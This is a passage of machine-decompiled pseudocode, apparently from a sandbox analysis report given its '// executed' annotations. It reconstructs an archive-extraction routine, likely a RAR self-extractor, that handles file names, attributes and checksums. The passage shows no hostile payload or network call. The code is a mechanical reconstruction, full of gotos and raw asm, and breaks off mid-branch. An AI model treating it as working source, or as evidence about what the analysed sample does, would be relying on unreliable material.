                                                                                                                                                              				intOrPtr _t501;
                                                                                                                                                              				signed int _t511;
                                                                                                                                                              				signed int _t512;
                                                                                                                                                              				signed int _t520;
                                                                                                                                                              				signed int _t523;
                                                                                                                                                              				signed int _t524;
                                                                                                                                                              				char _t527;
                                                                                                                                                              				signed int _t531;
                                                                                                                                                              				signed int _t541;
                                                                                                                                                              				signed int _t558;
                                                                                                                                                              				signed int _t559;
                                                                                                                                                              				signed int _t562;
                                                                                                                                                              				signed int _t570;
                                                                                                                                                              				signed int _t580;
                                                                                                                                                              				short* _t582;
                                                                                                                                                              				char* _t587;
                                                                                                                                                              				signed int _t591;
                                                                                                                                                              				short _t592;
                                                                                                                                                              				signed int _t597;
                                                                                                                                                              				signed int _t600;
                                                                                                                                                              				char* _t602;
                                                                                                                                                              				signed int _t604;
                                                                                                                                                              				signed int _t609;
                                                                                                                                                              				void* _t612;
                                                                                                                                                              				signed int _t621;
                                                                                                                                                              				signed int _t623;
                                                                                                                                                              				signed int _t627;
                                                                                                                                                              				intOrPtr _t628;
                                                                                                                                                              				signed int _t630;
                                                                                                                                                              				signed int _t634;
                                                                                                                                                              				intOrPtr _t640;
                                                                                                                                                              				char _t641;
                                                                                                                                                              				signed int _t653;
                                                                                                                                                              				void* _t706;
                                                                                                                                                              				signed int _t714;
                                                                                                                                                              				void* _t715;
                                                                                                                                                              				char* _t716;
                                                                                                                                                              				void* _t718;
                                                                                                                                                              
                                                                                                                                                              				_t706 = __edx;
                                                                                                                                                              				E00401200(0x2cd8);
                                                                                                                                                              				_t640 = _a4;
                                                                                                                                                              				_t716 = _a8;
                                                                                                                                                              				_t715 = __ecx;
                                                                                                                                                              				_v20 =  *((intOrPtr*)(_t640 + 0x329b));
                                                                                                                                                              				if(_a12 != 0) {
                                                                                                                                                              					L5:
                                                                                                                                                              					_t404 =  *((intOrPtr*)(_t716 + 0x4678));
                                                                                                                                                              					_a4 = _t404;
                                                                                                                                                              					__eflags = _t404 - 0x74;
                                                                                                                                                              					if(_t404 == 0x74) {
                                                                                                                                                              						__eflags =  *((char*)(_t715 + 0x1ddf));
                                                                                                                                                              						 *((char*)(_t715 + 0x11dd)) = 0;
                                                                                                                                                              						if( *((char*)(_t715 + 0x1ddf)) != 0) {
                                                                                                                                                              							L202:
                                                                                                                                                              							return 0;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *(_t640 + 0x28cc);
                                                                                                                                                              						if( *(_t640 + 0x28cc) != 0) {
                                                                                                                                                              							L24:
                                                                                                                                                              							OemToCharA(_t716 + 0x46d8, _t716 + 0x46d8);
                                                                                                                                                              							E0040A477( &_v1052, _t716 + 0x46d8);
                                                                                                                                                              							_v6204 = 0;
                                                                                                                                                              							_v21 = 0;
                                                                                                                                                              							_t414 = E00402AEE(_t640, _t716 + 0x46a8,  &_v21, 4); // executed
                                                                                                                                                              							__eflags = _t414;
                                                                                                                                                              							_a15 = _t414 != 0;
                                                                                                                                                              							__eflags = _a15;
                                                                                                                                                              							if(_a15 != 0) {
                                                                                                                                                              								__eflags = _v21;
                                                                                                                                                              								if(_v21 == 0) {
                                                                                                                                                              									 *((char*)(_t715 + 0x559)) = 0;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *(_t716 + 0x46b0) & 0x00000200;
                                                                                                                                                              							if(( *(_t716 + 0x46b0) & 0x00000200) == 0) {
                                                                                                                                                              								L29:
                                                                                                                                                              								_v5 = 0;
                                                                                                                                                              								L30:
                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                              								_t644 = _t715 + 0x15de;
                                                                                                                                                              								__eflags = _v5;
                                                                                                                                                              								_v16 =  ~(_v5 & 0x000000ff) & _t715 + 0x000015de;
                                                                                                                                                              								if(_v5 != 0) {
                                                                                                                                                              									E00407589(_t716, _t716 + 0x4ad8,  &_v6204);
                                                                                                                                                              									_t621 = E0040E115(_t644,  &_v6204,  &_v7228, 0x1000000);
                                                                                                                                                              									__eflags = _t621;
                                                                                                                                                              									if(_t621 != 0) {
                                                                                                                                                              										_t623 = E0040793A( &_v7228);
                                                                                                                                                              										__eflags = _t623;
                                                                                                                                                              										if(_t623 != 0) {
                                                                                                                                                              											E0040A477( &_v1052,  &_v7228);
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								E0040748A(_t715,  &_v1052,  &_v1052);
                                                                                                                                                              								_t421 = E00401BE7(_t716);
                                                                                                                                                              								__eflags = _t421;
                                                                                                                                                              								if(_t421 != 0) {
                                                                                                                                                              									L19:
                                                                                                                                                              									return 1;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *(_t716 + 0x46b0) & 0x00000800;
                                                                                                                                                              								if(( *(_t716 + 0x46b0) & 0x00000800) == 0) {
                                                                                                                                                              									_t424 = E00401BD5(_t716);
                                                                                                                                                              									__eflags = _t424;
                                                                                                                                                              									if(_t424 != 0) {
                                                                                                                                                              										L45:
                                                                                                                                                              										E00401C00(_t716);
                                                                                                                                                              										 *(_t715 + 0x4ee) =  *(_t716 + 0x46b0) >> 0x00000001 & 0x00000001;
                                                                                                                                                              										 *((char*)(_t715 + 0x4ef)) = 0;
                                                                                                                                                              										asm("sbb ecx, [esi+0x5384]");
                                                                                                                                                              										_t649 = _t716;
                                                                                                                                                              										_t431 = E004054ED(_t716,  *((intOrPtr*)(_t716 + 0x6d80)) -  *(_t716 + 0x5380),  *((intOrPtr*)(_t716 + 0x6d84)), 0);
                                                                                                                                                              										__eflags = _a15;
                                                                                                                                                              										_a11 = 0;
                                                                                                                                                              										_a7 = 0;
                                                                                                                                                              										_v25 = 0;
                                                                                                                                                              										if(_a15 != 0) {
                                                                                                                                                              											L47:
                                                                                                                                                              											__eflags = _v20 - 0x49;
                                                                                                                                                              											_push(_v25);
                                                                                                                                                              											_push((_t431 & 0xffffff00 | _v20 == 0x00000049) & 0x000000ff);
                                                                                                                                                              											_push( *(_t640 + 0x29ba) & 0x000000ff);
                                                                                                                                                              											_t437 = E0040BB56(_t649,  &_v1052,  &_v6204);
                                                                                                                                                              											__eflags = _t437;
                                                                                                                                                              											if(_t437 == 0) {
                                                                                                                                                              												goto L202;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                              											if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                              												L52:
                                                                                                                                                              												_v12 = _t715 + 0x11de;
                                                                                                                                                              												E0040A477(_t715 + 0x11de, _t640 + 0x810);
                                                                                                                                                              												__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 5;
                                                                                                                                                              												if( *((intOrPtr*)(_t640 + 0x28c8)) != 5) {
                                                                                                                                                              													L59:
                                                                                                                                                              													_a7 = 0;
                                                                                                                                                              													L56:
                                                                                                                                                              													__eflags = _v20 - 0x45;
                                                                                                                                                              													if(_v20 == 0x45) {
                                                                                                                                                              														L60:
                                                                                                                                                              														_t441 = E004073DB( &_v1052);
                                                                                                                                                              														L61:
                                                                                                                                                              														E0040A5E2(_v12, _t441);
                                                                                                                                                              														_t445 = E0040DA9A( *_v12 & 0x000000ff);
                                                                                                                                                              														__eflags = _a7;
                                                                                                                                                              														_v26 = _t445;
                                                                                                                                                              														if(_a7 != 0) {
                                                                                                                                                              															__eflags =  *((char*)(_t715 + 0x11df)) - 0x5f;
                                                                                                                                                              															if( *((char*)(_t715 + 0x11df)) == 0x5f) {
                                                                                                                                                              																_t597 = E004072B6( *((char*)(_t715 + 0x11e0)));
                                                                                                                                                              																__eflags = _t597;
                                                                                                                                                              																if(_t597 != 0) {
                                                                                                                                                              																	__eflags = _v26 - 0x41 - 0x19;
                                                                                                                                                              																	if(_v26 - 0x41 <= 0x19) {
                                                                                                                                                              																		 *((char*)(_t715 + 0x11df)) = 0x3a;
                                                                                                                                                              																	}
                                                                                                                                                              																}
                                                                                                                                                              															}
                                                                                                                                                              														}
                                                                                                                                                              														__eflags = _v5;
                                                                                                                                                              														if(_v5 == 0) {
                                                                                                                                                              															__eflags = 0;
                                                                                                                                                              															 *(_t715 + 0x15de) = 0;
                                                                                                                                                              															L81:
                                                                                                                                                              															__eflags = _v25;
                                                                                                                                                              															if(_v25 != 0) {
                                                                                                                                                              																L83:
                                                                                                                                                              																_a7 = 0;
                                                                                                                                                              																L84:
                                                                                                                                                              																__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                              																if( *((char*)(_t640 + 0x28c4)) != 0) {
                                                                                                                                                              																	L86:
                                                                                                                                                              																	__eflags = _v20 - 0x45;
                                                                                                                                                              																	if(_v20 == 0x45) {
                                                                                                                                                              																		L88:
                                                                                                                                                              																		E00403556( &_v11484);
                                                                                                                                                              																		_push(0);
                                                                                                                                                              																		__eflags = E00406045( &_v11484, _t706, _v12, _v16,  &_v11484);
                                                                                                                                                              																		if(__eflags == 0) {
                                                                                                                                                              																			__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                              																			L93:
                                                                                                                                                              																			if(__eflags == 0) {
                                                                                                                                                              																				L95:
                                                                                                                                                              																				__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                              																				if(( *(_t716 + 0x46b0) & 0x00000004) != 0) {
                                                                                                                                                              																					__eflags =  *((char*)(_t715 + 0x115c));
                                                                                                                                                              																					if( *((char*)(_t715 + 0x115c)) == 0) {
                                                                                                                                                              																						E0040325C(0x414c7c, 1);
                                                                                                                                                              																						_a7 = 0;
                                                                                                                                                              																					}
                                                                                                                                                              																				}
                                                                                                                                                              																				_t450 =  *(_t716 + 0x46c8);
                                                                                                                                                              																				__eflags = _t450 - 0x24;
                                                                                                                                                              																				if(_t450 != 0x24) {
                                                                                                                                                              																					__eflags = _t450 - 0x1d;
                                                                                                                                                              																					if(_t450 != 0x1d) {
                                                                                                                                                              																						__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                              																						if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                              																							E0040B2A9(_t716 + 0x17, E004098F7(0x6c),  &_v1052);
                                                                                                                                                              																							_t718 = _t718 + 0xc;
                                                                                                                                                              																							_a7 = 0;
                                                                                                                                                              																							E0040325C(0x414c7c, 1);
                                                                                                                                                              																						}
                                                                                                                                                              																					}
                                                                                                                                                              																				}
                                                                                                                                                              																				_t652 =  &_v4156;
                                                                                                                                                              																				E00404EC3( &_v4156);
                                                                                                                                                              																				_push( *(_t716 + 0x46cc));
                                                                                                                                                              																				_t452 = E004057B6();
                                                                                                                                                              																				__eflags = _t452;
                                                                                                                                                              																				if(_t452 != 0) {
                                                                                                                                                              																					L138:
                                                                                                                                                              																					__eflags = _a7;
                                                                                                                                                              																					if(_a7 != 0) {
                                                                                                                                                              																						goto L143;
                                                                                                                                                              																					}
                                                                                                                                                              																					goto L139;
                                                                                                                                                              																				} else {
                                                                                                                                                              																					_t652 = _t716;
                                                                                                                                                              																					_t523 = E00401BD5(_t716);
                                                                                                                                                              																					__eflags = _t523;
                                                                                                                                                              																					if(_t523 == 0) {
                                                                                                                                                              																						_t524 =  *(_t640 + 0x29ba);
                                                                                                                                                              																						__eflags = _t524;
                                                                                                                                                              																						if(_t524 != 0) {
                                                                                                                                                              																							__eflags = _a7;
                                                                                                                                                              																							if(_a7 != 0) {
                                                                                                                                                              																								_a11 = 1;
                                                                                                                                                              																							}
                                                                                                                                                              																						}
                                                                                                                                                              																						__eflags = _v20 - 0x45;
                                                                                                                                                              																						if(_v20 == 0x45) {
                                                                                                                                                              																							L130:
                                                                                                                                                              																							__eflags = _a7;
                                                                                                                                                              																							if(_a7 == 0) {
                                                                                                                                                              																								L139:
                                                                                                                                                              																								__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                              																								if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                              																									__eflags = _a7;
                                                                                                                                                              																									if(_a7 == 0) {
                                                                                                                                                              																										L195:
                                                                                                                                                              																										E00405074(_t640,  &_v4156);
                                                                                                                                                              																										__eflags = _a15;
                                                                                                                                                              																										if(_a15 != 0) {
                                                                                                                                                              																											_t394 = _t715 + 0x554;
                                                                                                                                                              																											 *_t394 =  *(_t715 + 0x554) + 1;
                                                                                                                                                              																											__eflags =  *_t394;
                                                                                                                                                              																										}
                                                                                                                                                              																										L197:
                                                                                                                                                              																										__eflags =  *((char*)(_t715 + 0x4ef));
                                                                                                                                                              																										if( *((char*)(_t715 + 0x4ef)) != 0) {
                                                                                                                                                              																											goto L202;
                                                                                                                                                              																										}
                                                                                                                                                              																										__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                              																										if( *((intOrPtr*)(_t716 + 4)) == 0xffffffff) {
                                                                                                                                                              																											goto L202;
                                                                                                                                                              																										}
                                                                                                                                                              																										__eflags = _a7;
                                                                                                                                                              																										if(_a7 != 0) {
                                                                                                                                                              																											goto L19;
                                                                                                                                                              																										}
                                                                                                                                                              																										__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                              																										if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                              																											L18:
                                                                                                                                                              																											E00401264(_t716);
                                                                                                                                                              																											goto L19;
                                                                                                                                                              																										}
                                                                                                                                                              																										__eflags = _v25;
                                                                                                                                                              																										if(_v25 != 0) {
                                                                                                                                                              																											goto L19;
                                                                                                                                                              																										}
                                                                                                                                                              																										goto L202;
                                                                                                                                                              																									}
                                                                                                                                                              																									L143:
                                                                                                                                                              																									__eflags = _v25;
                                                                                                                                                              																									if(_v25 == 0) {
                                                                                                                                                              																										__eflags = _a11;
                                                                                                                                                              																										if(_a11 == 0) {
                                                                                                                                                              																											__eflags = _v20 - 0x50;
                                                                                                                                                              																											if(_v20 != 0x50) {
                                                                                                                                                              																												_t512 = E00405051( &_v4156);
                                                                                                                                                              																												__eflags = _t512;
                                                                                                                                                              																												if(_t512 != 0) {
                                                                                                                                                              																													E0040B2A9(_t716 + 0x17, E004098F7(0x406), _v12);
                                                                                                                                                              																													_t718 = _t718 + 0xc;
                                                                                                                                                              																													E00403471(0x414c7c, _t716 + 0x17, _v12);
                                                                                                                                                              																												}
                                                                                                                                                              																											}
                                                                                                                                                              																										}
                                                                                                                                                              																										_t273 = _t715 + 0x54c;
                                                                                                                                                              																										 *_t273 =  *(_t715 + 0x54c) + 1;
                                                                                                                                                              																										__eflags =  *_t273;
                                                                                                                                                              																									}
                                                                                                                                                              																									L149:
                                                                                                                                                              																									 *((intOrPtr*)(_t715 + 0x550)) =  *((intOrPtr*)(_t715 + 0x550)) + 1;
                                                                                                                                                              																									_t653 = 0;
                                                                                                                                                              																									 *((intOrPtr*)(_t715 + 0x510)) = 0;
                                                                                                                                                              																									 *((intOrPtr*)(_t715 + 0x514)) = 0;
                                                                                                                                                              																									 *((intOrPtr*)(_t715 + 0x518)) = 0;
                                                                                                                                                              																									 *((intOrPtr*)(_t715 + 0x51c)) = 0;
                                                                                                                                                              																									__eflags =  *(_t716 + 0x6d88);
                                                                                                                                                              																									 *(_t715 + 0x538) =  *(_t715 + 0x538) | 0xffffffff;
                                                                                                                                                              																									 *((intOrPtr*)(_t715 + 0x534)) = (0 |  *(_t716 + 0x6d88) != 0x00000000) - 1;
                                                                                                                                                              																									_t456 =  *(_t716 + 0x46b0) & 0x0000ffff;
                                                                                                                                                              																									__eflags = _t456 & 0x00000004;
                                                                                                                                                              																									if((_t456 & 0x00000004) != 0) {
                                                                                                                                                              																										_t653 =  *(_t716 + 0x46c8) & 0x000000ff;
                                                                                                                                                              																									}
                                                                                                                                                              																									__eflags =  *(_t716 + 0x46c8) - 0x24;
                                                                                                                                                              																									asm("sbb dl, dl");
                                                                                                                                                              																									asm("sbb eax, eax");
                                                                                                                                                              																									E00409013(_t715 + 0x28, _t653, _t715 + 0x115c,  ~(_t456 & 0x400) & _t716 + 0x000052e4, 0, _t706 + 0x00000001 & 0x000000ff);
                                                                                                                                                              																									 *(_t715 + 0x48) =  *(_t716 + 0x5380);
                                                                                                                                                              																									 *(_t715 + 0x4c) =  *(_t716 + 0x5384);
                                                                                                                                                              																									E00408FF3(_t715 + 0x28, _t716,  &_v4156);
                                                                                                                                                              																									_t467 = _a11;
                                                                                                                                                              																									 *(_t715 + 0x51) = _t467;
                                                                                                                                                              																									 *((char*)(_t715 + 0x52)) = _v25;
                                                                                                                                                              																									__eflags = _t467;
                                                                                                                                                              																									if(_t467 != 0) {
                                                                                                                                                              																										L163:
                                                                                                                                                              																										 *(_t640 + 0x2900) =  *(_t640 + 0x29ba);
                                                                                                                                                              																										_v4137 = _t467 & 0xffffff00 |  *(_t640 + 0x2900) == 0x00000000;
                                                                                                                                                              																										if( *(_t640 + 0x29ba) != 0) {
                                                                                                                                                              																											L165:
                                                                                                                                                              																											_v16 = 0;
                                                                                                                                                              																											L166:
                                                                                                                                                              																											_push(_v16);
                                                                                                                                                              																											_push(_t715 + 0x534);
                                                                                                                                                              																											_push(_v12);
                                                                                                                                                              																											_push(_t716);
                                                                                                                                                              																											_push(_t715 + 0x28);
                                                                                                                                                              																											_t471 = E0040E110();
                                                                                                                                                              																											__eflags = _t471;
                                                                                                                                                              																											if(_t471 == 0) {
                                                                                                                                                              																												__eflags =  *(_t716 + 0x46b0) & 0x00000001;
                                                                                                                                                              																												if(( *(_t716 + 0x46b0) & 0x00000001) == 0) {
                                                                                                                                                              																													__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                              																													if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                              																														_t501 =  *((intOrPtr*)(_t715 + 0x548));
                                                                                                                                                              																														 *((intOrPtr*)(_t501 + 0x5760)) =  *((intOrPtr*)(_t716 + 0x5388));
                                                                                                                                                              																														 *(_t501 + 0x5764) =  *(_t716 + 0x538c);
                                                                                                                                                              																														 *((char*)(_t501 + 0x5778)) = 0;
                                                                                                                                                              																														__eflags =  *(_t716 + 0x46b0) >> 0x00000004 & 0x00000001;
                                                                                                                                                              																														E00411244( *(_t716 + 0x46c8) & 0x000000ff,  *(_t716 + 0x46b0) >> 0x00000004 & 1);
                                                                                                                                                              																													} else {
                                                                                                                                                              																														E004039B3(_t640, _t715 + 0x28,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c));
                                                                                                                                                              																													}
                                                                                                                                                              																												}
                                                                                                                                                              																											} else {
                                                                                                                                                              																												 *((char*)(_t715 + 0x11dd)) = _v16;
                                                                                                                                                              																											}
                                                                                                                                                              																											__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                              																											if( *((intOrPtr*)(_t716 + 4)) != 0xffffffff) {
                                                                                                                                                              																												E00401264(_t716);
                                                                                                                                                              																											}
                                                                                                                                                              																											__eflags = _v25;
                                                                                                                                                              																											_v5 = 0;
                                                                                                                                                              																											if(_v25 != 0) {
                                                                                                                                                              																												L183:
                                                                                                                                                              																												__eflags = _a11;
                                                                                                                                                              																												if(_a11 != 0) {
                                                                                                                                                              																													goto L195;
                                                                                                                                                              																												}
                                                                                                                                                              																												__eflags = _v20 - 0x58;
                                                                                                                                                              																												if(_v20 == 0x58) {
                                                                                                                                                              																													L186:
                                                                                                                                                              																													_push( *(_t716 + 0x46cc));
                                                                                                                                                              																													_t474 = E004057B6();
                                                                                                                                                              																													__eflags = _t474;
                                                                                                                                                              																													if(_t474 != 0) {
                                                                                                                                                              																														goto L195;
                                                                                                                                                              																													}
                                                                                                                                                              																													__eflags =  *((intOrPtr*)(_t640 + 0x28c0)) - _t474;
                                                                                                                                                              																													if( *((intOrPtr*)(_t640 + 0x28c0)) != _t474) {
                                                                                                                                                              																														_t369 = _t716 + 0x46cc;
                                                                                                                                                              																														 *_t369 =  *(_t716 + 0x46cc) & 0xffffffdf;
                                                                                                                                                              																														__eflags =  *_t369;
                                                                                                                                                              																													}
                                                                                                                                                              																													__eflags = _v5;
                                                                                                                                                              																													if(_v5 == 0) {
                                                                                                                                                              																														L192:
                                                                                                                                                              																														asm("sbb edx, edx");
                                                                                                                                                              																														asm("sbb eax, eax");
                                                                                                                                                              																														asm("sbb eax, eax");
                                                                                                                                                              																														E004053C5( &_v4156,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e88)) & _t716 + 0x00005310,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334); // executed
                                                                                                                                                              																														E00404F2E( &_v4156);
                                                                                                                                                              																														asm("sbb ecx, ecx");
                                                                                                                                                              																														asm("sbb ecx, ecx");
                                                                                                                                                              																														E0040504E(_t716 + 0x52ec,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334);
                                                                                                                                                              																														__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                              																														if(__eflags == 0) {
                                                                                                                                                              																															E004057E8(__eflags,  &_v4133,  &_v3108,  *(_t716 + 0x46cc));
                                                                                                                                                              																														}
                                                                                                                                                              																														 *((char*)(_t715 + 0x11dd)) = 1;
                                                                                                                                                              																														goto L195;
                                                                                                                                                              																													} else {
                                                                                                                                                              																														__eflags =  *(_t640 + 0x2900);
                                                                                                                                                              																														if( *(_t640 + 0x2900) == 0) {
                                                                                                                                                              																															goto L195;
                                                                                                                                                              																														}
                                                                                                                                                              																														E0040503E( &_v4156);
                                                                                                                                                              																														goto L192;
                                                                                                                                                              																													}
                                                                                                                                                              																												}
                                                                                                                                                              																												__eflags = _v20 - 0x45;
                                                                                                                                                              																												if(_v20 != 0x45) {
                                                                                                                                                              																													goto L195;
                                                                                                                                                              																												}
                                                                                                                                                              																												goto L186;
                                                                                                                                                              																											} else {
                                                                                                                                                              																												_t491 =  *(_t716 + 0x6d88);
                                                                                                                                                              																												__eflags = _t491;
                                                                                                                                                              																												if(_t491 == 0) {
                                                                                                                                                              																													L178:
                                                                                                                                                              																													__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  !( *(_t716 + 0x46c0));
                                                                                                                                                              																													if( *((intOrPtr*)(_t715 + 0x534)) ==  !( *(_t716 + 0x46c0))) {
                                                                                                                                                              																														goto L183;
                                                                                                                                                              																													}
                                                                                                                                                              																													L179:
                                                                                                                                                              																													__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                              																													_push( &_v1052);
                                                                                                                                                              																													if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                              																														_push(0x71);
                                                                                                                                                              																													} else {
                                                                                                                                                              																														_push(0x70);
                                                                                                                                                              																													}
                                                                                                                                                              																													E004098F7();
                                                                                                                                                              																													_push(_t716 + 0x17);
                                                                                                                                                              																													E0040B2A9();
                                                                                                                                                              																													_v5 = 1;
                                                                                                                                                              																													E00402C95(E0040325C(0x414c7c, 3));
                                                                                                                                                              																													goto L183;
                                                                                                                                                              																												}
                                                                                                                                                              																												__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  *(_t716 + 0x46c0);
                                                                                                                                                              																												if( *((intOrPtr*)(_t715 + 0x534)) ==  *(_t716 + 0x46c0)) {
                                                                                                                                                              																													goto L183;
                                                                                                                                                              																												}
                                                                                                                                                              																												__eflags = _t491;
                                                                                                                                                              																												if(_t491 != 0) {
                                                                                                                                                              																													goto L179;
                                                                                                                                                              																												}
                                                                                                                                                              																												goto L178;
                                                                                                                                                              																											}
                                                                                                                                                              																										}
                                                                                                                                                              																										__eflags = _v25;
                                                                                                                                                              																										_v16 = 1;
                                                                                                                                                              																										if(_v25 == 0) {
                                                                                                                                                              																											goto L166;
                                                                                                                                                              																										}
                                                                                                                                                              																										goto L165;
                                                                                                                                                              																									} else {
                                                                                                                                                              																										__eflags =  *((intOrPtr*)(_t716 + 0x6d98)) - _t467;
                                                                                                                                                              																										if( *((intOrPtr*)(_t716 + 0x6d98)) != _t467) {
                                                                                                                                                              																											goto L163;
                                                                                                                                                              																										}
                                                                                                                                                              																										_t511 =  *(_t716 + 0x5380);
                                                                                                                                                              																										_t714 =  *(_t716 + 0x538c);
                                                                                                                                                              																										_t467 = _t511 << 0xb;
                                                                                                                                                              																										__eflags = ( *(_t716 + 0x5384) << 0x00000020 | _t511) << 0xb - _t714;
                                                                                                                                                              																										if(__eflags < 0) {
                                                                                                                                                              																											goto L163;
                                                                                                                                                              																										}
                                                                                                                                                              																										if(__eflags > 0) {
                                                                                                                                                              																											L156:
                                                                                                                                                              																											__eflags = _t714;
                                                                                                                                                              																											if(__eflags < 0) {
                                                                                                                                                              																												L162:
                                                                                                                                                              																												_t467 = E0040551C( &_v4156,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c));
                                                                                                                                                              																												goto L163;
                                                                                                                                                              																											}
                                                                                                                                                              																											if(__eflags > 0) {
                                                                                                                                                              																												L159:
                                                                                                                                                              																												_t467 = E0040554A(_t716, _t714, __eflags);
                                                                                                                                                              																												__eflags = _t714 -  *(_t716 + 0x5384);
                                                                                                                                                              																												if(__eflags < 0) {
                                                                                                                                                              																													goto L163;
                                                                                                                                                              																												}
                                                                                                                                                              																												if(__eflags > 0) {
                                                                                                                                                              																													goto L162;
                                                                                                                                                              																												}
                                                                                                                                                              																												__eflags = _t467 -  *(_t716 + 0x5380);
                                                                                                                                                              																												if(_t467 <=  *(_t716 + 0x5380)) {
                                                                                                                                                              																													goto L163;
                                                                                                                                                              																												}
                                                                                                                                                              																												goto L162;
                                                                                                                                                              																											}
                                                                                                                                                              																											__eflags =  *((intOrPtr*)(_t716 + 0x5388)) - 0x5f5e100;
                                                                                                                                                              																											if(__eflags < 0) {
                                                                                                                                                              																												goto L162;
                                                                                                                                                              																											}
                                                                                                                                                              																											goto L159;
                                                                                                                                                              																										}
                                                                                                                                                              																										__eflags = _t467 -  *((intOrPtr*)(_t716 + 0x5388));
                                                                                                                                                              																										if(_t467 <=  *((intOrPtr*)(_t716 + 0x5388))) {
                                                                                                                                                              																											goto L163;
                                                                                                                                                              																										}
                                                                                                                                                              																										goto L156;
                                                                                                                                                              																									}
                                                                                                                                                              																								}
                                                                                                                                                              																								_push(1);
                                                                                                                                                              																								_push(0);
                                                                                                                                                              																								_push(0);
                                                                                                                                                              																								_v25 = 1;
                                                                                                                                                              																								_a11 = 1;
                                                                                                                                                              																								_a7 = 1;
                                                                                                                                                              																								_t520 = E0040BB56(_t652,  &_v1052,  &_v6204);
                                                                                                                                                              																								__eflags = _t520;
                                                                                                                                                              																								if(_t520 != 0) {
                                                                                                                                                              																									goto L149;
                                                                                                                                                              																								}
                                                                                                                                                              																								_t641 = 0;
                                                                                                                                                              																								L123:
                                                                                                                                                              																								E00405074(_t641,  &_v4156);
                                                                                                                                                              																								return _t641;
                                                                                                                                                              																							}
                                                                                                                                                              																							__eflags = _t524;
                                                                                                                                                              																							if(_t524 != 0) {
                                                                                                                                                              																								goto L138;
                                                                                                                                                              																							}
                                                                                                                                                              																							_t527 = E00404CF1(_t706, _t640,  &_v4156, _v12, _v16,  *((intOrPtr*)(_t640 + 0x28a4)),  &_v5,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4))); // executed
                                                                                                                                                              																							__eflags = _t527;
                                                                                                                                                              																							if(_t527 != 0) {
                                                                                                                                                              																								goto L138;
                                                                                                                                                              																							}
                                                                                                                                                              																							_a7 = _t527;
                                                                                                                                                              																							__eflags = _v5 - _t527;
                                                                                                                                                              																							if(_v5 != _t527) {
                                                                                                                                                              																								goto L139;
                                                                                                                                                              																							}
                                                                                                                                                              																							E004033DB(_t716 + 0x17, _v12);
                                                                                                                                                              																							_t652 = 0x414c7c;
                                                                                                                                                              																							E0040325C(0x414c7c, 9);
                                                                                                                                                              																							_t531 = E0040793A(_v12);
                                                                                                                                                              																							__eflags = _t531;
                                                                                                                                                              																							if(_t531 != 0) {
                                                                                                                                                              																								goto L139;
                                                                                                                                                              																							}
                                                                                                                                                              																							_push(E004098F7(0x456));
                                                                                                                                                              																							_push(_t716 + 0x17);
                                                                                                                                                              																							E0040B2A9();
                                                                                                                                                              																							E0040DB30( &_v7228, _v12, 0x400);
                                                                                                                                                              																							E004079A3(_v12, 1);
                                                                                                                                                              																							E004058FF(_t640, _t716, _v12, 0, 1);
                                                                                                                                                              																							_t541 = E00404CF1(_t706, _t640,  &_v4156, _v12, 0,  *((intOrPtr*)(_t640 + 0x28a4)),  &_v5,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4)));
                                                                                                                                                              																							__eflags = _t541;
                                                                                                                                                              																							if(_t541 == 0) {
                                                                                                                                                              																								_t652 = 0x414c7c;
                                                                                                                                                              																								E004033DB(_t716 + 0x17, _v12);
                                                                                                                                                              																								goto L138;
                                                                                                                                                              																							}
                                                                                                                                                              																							_a7 = 1;
                                                                                                                                                              																							goto L143;
                                                                                                                                                              																						} else {
                                                                                                                                                              																							__eflags = _v20 - 0x58;
                                                                                                                                                              																							if(_v20 != 0x58) {
                                                                                                                                                              																								goto L138;
                                                                                                                                                              																							}
                                                                                                                                                              																							goto L130;
                                                                                                                                                              																						}
                                                                                                                                                              																					}
                                                                                                                                                              																					__eflags = _a7;
                                                                                                                                                              																					if(_a7 == 0) {
                                                                                                                                                              																						L124:
                                                                                                                                                              																						E00405074(_t640,  &_v4156);
                                                                                                                                                              																						goto L19;
                                                                                                                                                              																					}
                                                                                                                                                              																					__eflags = _v20 - 0x50;
                                                                                                                                                              																					if(_v20 == 0x50) {
                                                                                                                                                              																						goto L124;
                                                                                                                                                              																					}
                                                                                                                                                              																					__eflags = _v20 - 0x45;
                                                                                                                                                              																					if(_v20 == 0x45) {
